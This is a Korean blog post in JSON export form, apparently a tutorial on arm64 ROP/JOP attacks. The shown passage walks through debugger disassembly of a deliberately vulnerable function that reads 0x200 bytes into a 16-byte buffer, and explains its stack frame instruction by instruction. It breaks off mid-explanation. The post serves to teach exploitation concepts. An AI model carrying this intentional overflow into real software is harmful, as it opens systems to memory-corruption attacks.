{"id":2558,"date":"2024-05-31T08:15:41","date_gmt":"2024-05-30T23:15:41","guid":{"rendered":"https:\/\/h4ck.kr\/?p=2558"},"modified":"2024-06-04T10:05:02","modified_gmt":"2024-06-04T01:05:02","slug":"arm64-%ed%99%98%ea%b2%bd%ec%97%90%ec%84%9c-rop-jop-%ea%b3%b5%ea%b2%a9-%ec%9d%b4%ed%95%b4%ed%95%98%ea%b8%b0-%ec%9e%91%ec%84%b1-%ec%a4%91","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=2558","title":{"rendered":"arm64 \ud658\uacbd\uc5d0\uc11c rop, jop \uacf5\uaca9 \uc774\ud574\ud558\uae30"},"content":{"rendered":"\n<p>\uc774\ubc88 \uc2dc\uac04\uc5d0\ub294 rop, jop \uacf5\uaca9\uc744 \uc774\ud574\ud558\uae30 \uc704\ud574 \uc544\ub798 \ud504\ub85c\uc81d\ud2b8\ub97c \ud65c\uc6a9\ud558\uc5ec <br>\uc9c1\uc811 \ub514\ubc84\uae45\ud558\uba74\uc11c \uc2a4\ud0dd \ud504\ub808\uc784\uc774 \uc0dd\uaca8\uc9c0\ub294 \uacfc\uc815\uacfc \uac01 \uba85\ub839\uc5b4 \uc758\ubbf8, \uac01 \ubc94\uc6a9 \ub808\uc9c0\uc2a4\ud130\ub4e4\uc774 \uc5b4\ub5bb\uac8c \ud65c\uc6a9\ub418\ub294\uc9c0 \uc54c\uc544\ubcfc \uac83\uc774\ub2e4.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/geesun\/arm64_rop_jop\">https:\/\/github.com\/geesun\/arm64_rop_jop<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">ROP<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">1. \uc2a4\ud0dd \ud504\ub808\uc784 \ud615\uc131 \ubc0f \uac01 \uba85\ub839\uc5b4 \uc218\ud589 \uacfc\uc815 \uc774\ud574\ud558\uae30<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">main<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">peda-arm > disas main\nDump of assembler code for function main:\n   0x0000000000400464 &lt;+0>:\tstp\tx29, x30, [sp, #-16]!\n   0x0000000000400468 &lt;+4>:\tmov\tx29, sp\n   0x000000000040046c &lt;+8>:\tbl\t0x40041c &lt;rop_bad_func>\n   0x0000000000400470 &lt;+12>:\tmov\tw0, #0x0                   \t\/\/ #0\n   0x0000000000400474 &lt;+16>:\tldp\tx29, x30, [sp], #16\n   0x0000000000400478 &lt;+20>:\tret\nEnd of assembler dump.<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int main()\n{<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400464 &lt;+0>:\tstp\tx29, x30, [sp, #-16]!<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"596\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-1024x596.png\" alt=\"\" class=\"wp-image-2639\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-1024x596.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-300x174.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-768x447.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-1536x893.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-2048x1191.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p><strong>x29 \ub808\uc9c0\uc2a4\ud130<\/strong><br>\ud504\ub808\uc784 \ud3ec\uc778\ud130 \ub808\uc9c0\uc2a4\ud130\ub85c, \uc2a4\ud0dd \ud504\ub808\uc784\uc744 \ucd94\uc801\ud560 \ub54c \uc0ac\uc6a9\ub41c\ub2e4.<br>\ud568\uc218\uac00 \ud638\ucd9c\ub418\uc5b4 \uc0c8\ub85c\uc6b4 \uc2a4\ud0dd \ud504\ub808\uc784\uc774 \uc0dd\uc131\ub420 \ub54c, x29 \ub808\uc9c0\uc2a4\ud130\uac00 \uc2a4\ud0dd\uc5d0 \uc800\uc7a5\ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>x30 \ub808\uc9c0\uc2a4\ud130<\/strong><br>lr \ub9c1\ud06c \ub808\uc9c0\uc2a4\ud130\ub85c, BL\/BLR \uba85\ub839\uc5d0 \uc758\ud574 \ub2e4\ub978 \uc8fc\uc18c\ub85c \ubd84\uae30\ub420 \ub54c <br>pc \ub808\uc9c0\uc2a4\ud130\uac12\uc744 \uc774 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc800\uc7a5\ud55c\ub2e4.<br>\uc774\uc804 \ud568\uc218\ub85c \ub3cc\uc544\uac00\uae30 \uc704\ud55c \uc8fc\uc18c\uac00 \ub2f4\uaca8\uc788\ub2e4\uace0 \ubcf4\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<p>\ub530\ub77c\uc11c, \ud604\uc7ac \ud568\uc218\uc758 \ud504\ub808\uc784\uc744 \uc0dd\uc131\uc2dc\ud0a4\uae30 \uc704\ud55c \uc900\ube44 \uc791\uc5c5\uc73c\ub85c, <br>\uc774\uc804 \ud568\uc218\uc758 \ud504\ub808\uc784 \ud3ec\uc778\ud130 \uc8fc\uc18c\uc778 x29 \ub808\uc9c0\uc2a4\ud130\uac12\uacfc <br>\uc774\uc804 \ud568\uc218\ub85c \ub418\ub3cc\uc544\uac00\uae30 \uc704\ud55c \ubcf5\uadc0 \uc8fc\uc18c\ub97c \uc758\ubbf8\ud558\ub294 x30 \ub808\uc9c0\uc2a4\ud130\uac12\uc774 \uc2a4\ud0dd\uc5d0 \uc800\uc7a5\ud558\ub294\ub370,<br>\uc774\ub54c \uc800\uc7a5\ud558\uae30 \uc704\ud574 16\ubc14\uc774\ud2b8 \uacf5\uac04\uc744 \uba3c\uc800 \ub298\ub9ac\uace0 \uc9c4\ud589\ud55c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400468 &lt;+4>:\tmov\tx29, sp<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-1024x587.png\" alt=\"\" class=\"wp-image-2570\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-1024x587.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-300x172.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-768x440.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-1536x880.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-2048x1173.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p>\ud604\uc7ac \uc2a4\ud0dd \ud3ec\uc778\ud130\ub97c \uc758\ubbf8\ud558\ub294 sp \ub808\uc9c0\uc2a4\ud130 \uac12\uc744 \ud504\ub808\uc784 \ud3ec\uc778\ud130\ub97c \uc758\ubbf8\ud558\ub294 x29 \ub808\uc9c0\uc2a4\ud130\ub85c \ubcf5\uc0ac\ud55c\ub2e4.<\/p>\n\n\n\n<p>\ub530\ub77c\uc11c, \ud604\uc7ac \ud568\uc218\uc758 \uc0c8\ub85c\uc6b4 \ud504\ub808\uc784 \ud3ec\uc778\ud130\ub97c \uc124\uc815\ud558\uae30 \uc704\ud55c \ubaa9\uc801\uc73c\ub85c, \ud574\ub2f9 \uba85\ub839\uc5b4\uac00 \uc874\uc7ac\ud55c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">rop_bad_func();<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040046c &lt;+8>:\tbl\t0x40041c &lt;rop_bad_func><\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"736\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-1024x736.png\" alt=\"\" class=\"wp-image-2571\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-1024x736.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-300x216.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-768x552.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-1536x1104.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-2048x1472.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p><strong>BL (Branch with Link)<\/strong> &lt;rop_bad_func&gt;<\/p>\n\n\n\n<p>\ub0b4\ubd80\uc801\uc73c\ub85c \uc544\ub798\uc640 \uac19\uc774 \uc218\ud589\ub41c\ub2e4.<br>(1) mov lr, = next instruction (pc)<br>(2) mov pc, =dest<\/p>\n\n\n\n<p>BL \uba85\ub839\uc5b4\uc5d0 \uc758\ud574 rop_bad_func \ud568\uc218\uac00 \ud638\ucd9c\ub418\uace0 \ub09c\ub4a4\uc5d0 lr \ub808\uc9c0\uc2a4\ud130\uc5d0 \ub2e4\uc2dc main \ud568\uc218\ub85c \ub418\ub3cc\uc544\uac08 \ubcf5\uadc0 \uc8fc\uc18c\uac00 \uc800\uc7a5\ub418\uace0,<br>rop_bad_func \ud568\uc218\ub85c \ubd84\uae30\ub418\uc5b4, \uadf8 \ud568\uc218\uc758 \uc8fc\uc18c\ub85c pc \uac12\uc774 \ubc14\ub00c\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<p>\uc5ec\uae30\uc11c pc \ub808\uc9c0\uc2a4\ud130\ub294 \ud504\ub85c\uadf8\ub7a8 \uce74\uc6b4\ud130\ub85c, \ub2e4\uc74c \uba85\ub839\uc744 \uac00\ub9ac\ud0a4\uac8c \uc0ac\uc6a9\ub41c\ub2e4.<br>x86_64 \uc544\ud0a4\ud14d\ucc98\uc5d0 \uc0ac\uc6a9\ub418\ub294 RIP \ub808\uc9c0\uc2a4\ud130 \uc0ac\uc6a9 \uc6a9\ub3c4\uc640 \ube44\uc2b7\ud558\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void rop_bad_func()\n{<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040041c &lt;+0>:\tstp\tx29, x30, [sp, #-48]!\n0x0000000000400420 &lt;+4>:\tmov\tx29, sp<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"826\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-1024x826.png\" alt=\"\" class=\"wp-image-2580\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-1024x826.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-300x242.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-768x620.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-1536x1239.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-2048x1652.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\uc124\uba85<\/strong><\/h3>\n\n\n\n<p>\ub2e4\uc2dc \ud55c\ubc88 \ub354 \ud504\ub808\uc784\uc744 \uc0dd\uc131\uc2dc\ud0a4\uae30 \uc704\ud55c \uc900\ube44 \uc791\uc5c5\uc73c\ub85c, \uc2a4\ud0dd \ud3ec\uc778\ud130 sp\ub97c 48\ub9cc\ud07c \ube7c\uc11c \uadf8\ub9cc\ud07c \uc2a4\ud0dd \uacf5\uac04\uc744 \ud655\uc7a5\uc2dc\ud0a8\ub2e4.<br>main \ud568\uc218\uc5d0\uc11c\uc758 \ud504\ub808\uc784 \ud3ec\uc778\ud130 \uc8fc\uc18c\uc640 main \ud568\uc218\ub85c \ubcf5\uadc0\ud558\uae30 \uc704\ud55c \uc8fc\uc18c\uac00 \uc2a4\ud0dd\uc5d0 \uc800\uc7a5\ub41c\ub2e4.<\/p>\n\n\n\n<p>\ub610, mov x29, sp \uba85\ub839\uc5b4\uc5d0 \uc758\ud574<br>\ud604\uc7ac rop_bad_func \ud568\uc218\uc758 \uc0c8\ub85c\uc6b4 \ud504\ub808\uc784 \ud3ec\uc778\ud130\ub97c \uc124\uc815\ud558\uae30 \uc704\ud55c \ubaa9\uc801\uc73c\ub85c, <br>sp \ub808\uc9c0\uc2a4\ud130\uac12\uc744 x29 \ub808\uc9c0\uc2a4\ud130\ub85c \ubcf5\uc0ac\ud55c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>rop_bad_func<\/strong><\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">peda-arm > disas rop_bad_func\nDump of assembler code for function rop_bad_func:\n   0x000000000040041c &lt;+0>:\tstp\tx29, x30, [sp, #-48]!\n   0x0000000000400420 &lt;+4>:\tmov\tx29, sp\n   0x0000000000400424 &lt;+8>:\tstp\txzr, xzr, [x29, #24]\n   0x0000000000400428 &lt;+12>:\tstr\txzr, [x29, #16]\n   0x000000000040042c &lt;+16>:\tstr\twzr, [x29, #44]\n   0x0000000000400430 &lt;+20>:\tadrp\tx0, 0x450000 &lt;_nl_locale_subfreeres+440>\n   0x0000000000400434 &lt;+24>:\tadd\tx0, x0, #0x5c0\n   0x0000000000400438 &lt;+28>:\tmov\tw1, #0x0\n   0x000000000040043c &lt;+32>:\tbl\t0x418de0 &lt;open64>\n   0x0000000000400440 &lt;+36>:\tstr\tw0, [x29, #44]\n   0x0000000000400444 &lt;+40>:\tadd\tx0, x29, #0x10\n   0x0000000000400448 &lt;+44>:\tmov\tx2, #0x200\n   0x000000000040044c &lt;+48>:\tmov\tx1, x0\n   0x0000000000400450 &lt;+52>:\tldr\tw0, [x29, #44]\n   0x0000000000400454 &lt;+56>:\tbl\t0x418fd8 &lt;read>\n   0x0000000000400458 &lt;+60>:\tnop\n   0x000000000040045c &lt;+64>:\tldp\tx29, x30, [sp], #48\n   0x0000000000400460 &lt;+68>:\tret<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">char data[16] = {0}; <\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400424 &lt;+8>:\tstp\txzr, xzr, [x29, #24]<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"818\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-1024x818.png\" alt=\"\" class=\"wp-image-2583\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-1024x818.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-300x240.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-768x614.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-1536x1227.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-2048x1637.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p>STP \uba85\ub839\uc5b4\ub294 Store Pair of Registers\ub85c,<br>\ub808\uc9c0\uc2a4\ud130\ub97c \uc30d\uc73c\ub85c \uc800\uc7a5, \uc989 \ub450 \ub808\uc9c0\uc2a4\ud130\ub97c \uc5f0\uc18d\ub41c \uba54\ubaa8\ub9ac \uc704\uce58\uc5d0 \uc800\uc7a5\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p>\ub530\ub77c\uc11c, x29 \ud504\ub808\uc784\ud3ec\uc778\ud130\ub85c\ubd80\ud130 24\ubc14\uc774\ud2b8, 32\ubc14\uc774\ud2b8 \ub5a8\uc5b4\uc9c4 \uc8fc\uc18c\uc5d0 \uac01\uac01 0\uc73c\ub85c \uac12\uc744 \uc9c0\uc815\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">unsigned long long u64 = 0; <\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400428 &lt;+12>:\tstr\txzr, [x29, #16]<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"818\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-1024x818.png\" alt=\"\" class=\"wp-image-2589\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-1024x818.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-300x240.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-768x614.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-1536x1227.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-2048x1637.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p>STR \uba85\ub839\uc5b4\ub294 Store, \uc989 \ub808\uc9c0\uc2a4\ud130\uc758 \uac12\uc744 \uba54\ubaa8\ub9ac\uc5d0 \uc800\uc7a5\ud558\ub77c\ub294 \uc758\ubbf8\uc774\ub2e4.<\/p>\n\n\n\n<p>x29 \ud504\ub808\uc784 \ud3ec\uc778\ud130\ub85c\ubd80\ud130 16\ubc14\uc774\ud2b8 \ub5a8\uc5b4\uc9c4 \uc704\uce58\uc5d0 \uac12\uc744 0\uc73c\ub85c \uc800\uc7a5\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int fd = 0;<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040042c &lt;+16>:\tstr\twzr, [x29, #44]<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"736\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-1024x736.png\" alt=\"\" class=\"wp-image-2592\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-1024x736.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-300x216.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-768x552.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-1536x1105.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-2048x1473.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\uc124\uba85<\/strong><\/h3>\n\n\n\n<p>WZR\uc740 4\ubc14\uc774\ud2b8 \ud0c0\uc785\uc758 \uc81c\ub85c \ub808\uc9c0\uc2a4\ud130\ub97c \uc758\ubbf8\ud55c\ub2e4.<\/p>\n\n\n\n<p>x29 \ud504\ub808\uc784\ud3ec\uc778\ud130\ub85c\ubd80\ud130 44\ubc14\uc774\ud2b8 \ub5a8\uc5b4\uc9c4 \uc704\uce58\uc5d0 4\ubc14\uc774\ud2b8 \ud0c0\uc785\uc758 0\uac12\uc744 \uc800\uc7a5\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"75\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1-1024x75.png\" alt=\"\" class=\"wp-image-2595\" style=\"width:auto;height:30px\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1-1024x75.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1-300x22.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1-768x56.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1.png 1443w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400430 &lt;+20>:\tadrp\tx0, 0x450000 &lt;_nl_locale_subfreeres+440>\n0x0000000000400434 &lt;+24>:\tadd\tx0, x0, #0x5c0<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p>ADRP \uba85\ub839\uc5b4\uc5d0 \uc758\ud574 x0 